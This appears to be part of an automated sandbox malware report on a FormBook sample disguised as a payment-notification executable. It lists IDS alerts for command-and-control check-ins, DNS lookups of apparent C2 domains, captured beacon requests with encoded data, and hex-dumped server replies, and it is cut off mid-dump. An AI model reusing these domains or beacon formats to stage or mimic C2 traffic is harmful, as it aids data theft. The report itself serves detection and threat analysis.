                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 104.21.18.171:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 104.21.18.171:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 136.243.225.5:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 136.243.225.5:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 103.174.136.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 103.174.136.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50048 -> 103.174.136.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 199.59.243.228:80
                Source: DNS query: www.sesanu.xyz
                Source: DNS query: www.tabyscooterrentals.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.18.171 104.21.18.171
                Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0095CE44
                Source: global trafficHTTP traffic detected: GET /ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.zucchini.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.ogbos88.cyouConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.esscosaathi.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.myfastuploader.sbsConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sesanu.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sovz.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.tabyscooterrentals.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sql.danceConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /ucix/?idTDev6P=PvAg9QCS6Z5JTHKbpS7nTnQEYV78sBmDdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOIQKoTuDn9aElepw412NEgoxxpo789p/RNg=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.811371bb10.buzzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.rtp189z.latConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficHTTP traffic detected: GET /8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.u75lmwdgp0du.homesConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                Source: global trafficDNS traffic detected: DNS query: www.biocaracol.online
                Source: global trafficDNS traffic detected: DNS query: www.zucchini.pro
                Source: global trafficDNS traffic detected: DNS query: www.yacolca.digital
                Source: global trafficDNS traffic detected: DNS query: www.ogbos88.cyou
                Source: global trafficDNS traffic detected: DNS query: www.esscosaathi.info
                Source: global trafficDNS traffic detected: DNS query: www.myfastuploader.sbs
                Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
                Source: global trafficDNS traffic detected: DNS query: www.sesanu.xyz
                Source: global trafficDNS traffic detected: DNS query: www.sovz.pro
                Source: global trafficDNS traffic detected: DNS query: www.tabyscooterrentals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.sql.dance
                Source: global trafficDNS traffic detected: DNS query: www.811371bb10.buzz
                Source: global trafficDNS traffic detected: DNS query: www.rtp189z.lat
                Source: global trafficDNS traffic detected: DNS query: www.glyttera.shop
                Source: global trafficDNS traffic detected: DNS query: www.usps-infora.top
                Source: global trafficDNS traffic detected: DNS query: www.u75lmwdgp0du.homes
                Source: unknownHTTP traffic detected: POST /q1v9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.ogbos88.cyouOrigin: http://www.ogbos88.cyouReferer: http://www.ogbos88.cyou/q1v9/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 77 54 38 73 65 49 7a 49 58 39 32 61 6d 6d 45 31 54 4d 43 79 4b 6d 31 6c 33 4c 46 6e 5a 68 33 62 59 4e 58 2f 6a 69 56 32 62 4b 6f 70 73 54 79 70 71 38 43 58 65 65 48 36 5a 6e 43 41 44 4c 35 44 48 75 58 77 71 77 4f 38 33 32 4c 70 79 67 59 4f 6f 49 32 6f 41 57 50 6a 4e 41 55 6f 63 50 55 61 6c 50 38 36 6a 58 69 79 6d 37 32 77 7a 30 72 74 75 6d 48 5a 65 47 47 6a 55 79 56 6c 6f 58 39 64 55 48 69 4c 7a 41 6b 5a 59 6b 56 33 32 55 52 41 43 41 77 72 72 4b 50 67 58 6a 79 78 6c 76 4a 58 65 2f 68 50 2b 66 77 4c 5a 44 78 6c 7a 2b 33 4b 73 7a 73 34 35 51 3d 3d Data Ascii: idTDev6P=rcFR0ScrqPh/wT8seIzIX92ammE1TMCyKm1l3LFnZh3bYNX/jiV2bKopsTypq8CXeeH6ZnCADL5DHuXwqwO832LpygYOoI2oAWPjNAUocPUalP86jXiym72wz0rtumHZeGGjUyVloX9dUHiLzAkZYkV32URACAwrrKPgXjyxlvJXe/hP+fwLZDxlz+3Kszs45Q==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qaLspminxDITApjpX%2F7FjrDf5bDfL7USOzvER0IpMma6CzvMNXwKVocNYucN8uqc4MWx6NuATd3NVUU%2BHjLdDIwX48%2BzG%2B%2Fpk5l%2B7nrDkW1YSrg2xSbzmkIgbiY%2FCWOGDxK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fb59f395e62-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jc7qfFfZ7I3FRias3CFKpfZZp1SY8PwblZQ%2BjN627zoAqxQjA15%2F0o3U8WWrCiqhsYoqMxu7r88CJ4GwW3QyOOlbNO42TjHFpKY1PA%2FiEubEAiFjh%2FFIIN98f0HnP25Zr%2FDE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fc5a98e432c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1676&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKCMPbw1omOcB84Tpt9%2BK242kenX68YxcKBKe%2B3VcggY1ULWDYxIGueMrvJNsawQ1TJ5rYIqsRGVtPgjJjSd%2Fwwy7YYoYau0wU63SEhzOfdMhboa9KleSHSDOyVZzhZTYv%2BN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fd58ee18c5f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1940&rtt_var=970&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzI32YBuEIg8J1ALTg3gm%2BAJHCXDPJgNTBKHKv4kLbAqD%2FU9tTbi1Bn0k5kBZusOSD%2F6cDuYl1IlJm7%2BY0r6OZHylCHyOv8jmHFuU87KbdKbY1escpq4hTKNbcvDXmIWR5Nq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fe58aac4319-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:50 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
